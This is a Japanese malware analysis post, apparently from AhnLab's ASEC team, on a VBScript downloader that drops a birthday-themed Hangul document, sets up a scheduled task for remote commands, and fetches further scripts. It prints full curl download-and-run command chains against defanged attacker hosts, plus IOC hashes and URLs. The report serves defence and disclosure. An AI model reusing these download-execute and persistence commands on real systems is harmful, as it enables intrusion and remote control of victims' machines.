誕生日を祝う内容に偽装した不正なアレアハングルドキュメント (OLE オブジェクト)

ASEC 分析チームは最近、不正なアレアハングルファイルをダウンロードする VBScript を確認した。このマルウェアの正確な配布経路は確認されていないが、VBScript は curl を通じてダウンロードされる。

現在確認されているコマンドは以下の通りである。

  • curl  -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp
  • cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp

どちらのコマンドも %APPDATA% フォルダーに vbtemp の名前でスクリプトを保存する。hxxp://datkka.atwebpages[.]com/2vbs には以下の図のようにタスクスケジューラ登録およびさらなるファイルのダウンロード等の機能を実行する VBScript コードが存在する。

図1.hxxp://datkka.atwebpages[.]com/2vbs で確認できるスクリプト

ダウンロードされた vbtemp ファイルは wscript  //e:vbscript //b %APPDATA%\vbtemp コマンドを通じて実行される。スクリプトが正常に実行されるためには %APPDATA% フォルダーに tmp~pth ファイルが存在しなければならない。現在 tmp~pth ファイルは確認されていないが、APPDATA フォルダーのパスが保存されているものと推定される。

vbtemp ファイルを実行すると curl コマンドを通じてアレアハングルファイル(.hwp)をダウンロードし、%APPDATA%\tmp~pth ファイルに保存されているパスを参照して当該パスに 1.hwp の名前で保存して実行する。このとき実行されるコマンドは以下の通りである。

cmd /c  curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) hrome/53.0.3027.64 Safari/537.32” hxxps://bigfile.mail.naver[.]com/download?fid=adR0Wz+5+BKjK3YXKoF0KxuXKAElKxujKogZKog/KoUwKAUdFAujKxMrKqbXKoKla3YlFxUmaxUmF4J4pztrpAUqMxM/K6FCK4M9KqpvpovwMm== -o [\tmp~pth に保存されたパス]\ 1.hwp && [\tmp~pth に保存されたパス]\1.hwp
vbtemp で実行されるコマンド-1

その後、上記と同じく curl コマンドを使用してさらなるスクリプトをダウンロードする。ダウンロードされたスクリプトは %APPDATA%\Microsoft\Windows\Themes\TransWallpaper に保存される。また、先にダウンロードした 1.hwp ファイルをもう一度実行する。

cmd /c curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3027.64 Safari/537.32” hxxp://datkka.atwebpages[.]com/mal -o  %APPDATA%\Microsoft\Windows\Themes\TransWallpaper && [\tmp~pth に保存されたパス]\1.hwp
vbtemp で実行されるコマンド-2
図2.hxxp://datkka.atwebpages[.]com/mal で確認できるスクリプト

生成された TransWallpaper ファイルはタスクスケジューラ登録によって30分ごとにスクリプトが自動で実行されるようにする。

図3.生成されたタスクスケジューラ

このスクリプトファイルは hxxp://datkka.atwebpages[.]com/down.php からさらなるコマンドを受け取り実行する。現在は以下の「cmd /c calc」コマンドが受信されるが、攻撃者によりコマンドの変更が可能であり、その場合は様々な不正な振る舞いが発現する可能性がある。

図4.hxxp://datkka.atwebpages[.]com/down.php のレスポンス

前もって 1.hwp として保存したアレアハングルファイルは、開くと %temp% フォルダーに HappyBirthday.vbs を生成する。

アレアハングルファイルの内部には相手のパスで作成されたリンクが存在する。ユーザーがリンクをクリックすると ..\AppData\Local\Temp\HappyBirthday (2).vbs ファイルが実行される。このとき実行するファイル名が HappyBirthday (2).vbs である理由は、vbtemp スクリプト実行時に 1.hwp ファイルを2回実行するためと見られる。ユーザーが単純にアレアハングルファイルをクリックして実行する場合、ドロップされる HappyBirthday.vbs のファイル名が一致しないため、不正な振る舞いが実行されない。

図5. アレアハングルファイルの本文
図6.アレアハングルファイルのドキュメント情報

[図6]のように、アレアハングルドキュメントの作成者は韓国国内の「朝鮮半島平和教育プラットフォーム」と確認され、北朝鮮と関連する人物をターゲットにして製作されたものと推定できる。

アレアハングルファイルによりドロップ、実行される HappyBirthday.vbs は hxxps://driver.googledocs.cloudns[.]nz/Yb/yb にアクセスしてさらなるスクリプトをダウンロードしたあと %appdata%\tmp~1 に保存および実行する。

curl -k -H “”User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36″” hxxps://driver.googledocs.cloudns[.]nz/Yb/yb -o %appdata%\tmp~1 & wscript.exe //e:vbscript //b %appdata%\tmp~1
HappyBirthday.vbs の実行コマンド

現在は hxxps://driver.googledocs.cloudns[.]nz/Yb/yb にアクセスできず、以降の振る舞いは確認ができないが、攻撃者の意図によって様々な不正なコマンドが実行される可能性がある。

マルウェアの正確な配布経路は確認されていないが、様々なファイルを利用しているだけにユーザーの注意が必要である。出どころが不明なファイルは開かないようにし、使用しているアプリケーションおよび V3 を最新バージョンにアップデートして使用しなければならない。

[ファイル検知]
Downloader/VBS.Agent
Dropper/HWP.Generic

[IOC]
7c38b40ec19609f32de2a70d409c38b0 (vbs)
60d117f5cb7b0f8133967ec535c85c6a (vbs)
d86d57c1d8670d510e7b7a1ad7db9fd2 (vbs)
6083a1af637d9dd2b2a16538a17e1f45 (hwp)
ca2917006eb29171c9e5f374e789f53a (vbs)
hxxp://datkka.atwebpages.com/2vbs
hxxp://datarium.epizy.com/2vbs
hxxp://datkka.atwebpages.com/mal
hxxp://datkka.atwebpages.com/down.php
hxxps://driver.googledocs.cloudns[.]nz/Yb/yb

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:,

0 0 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments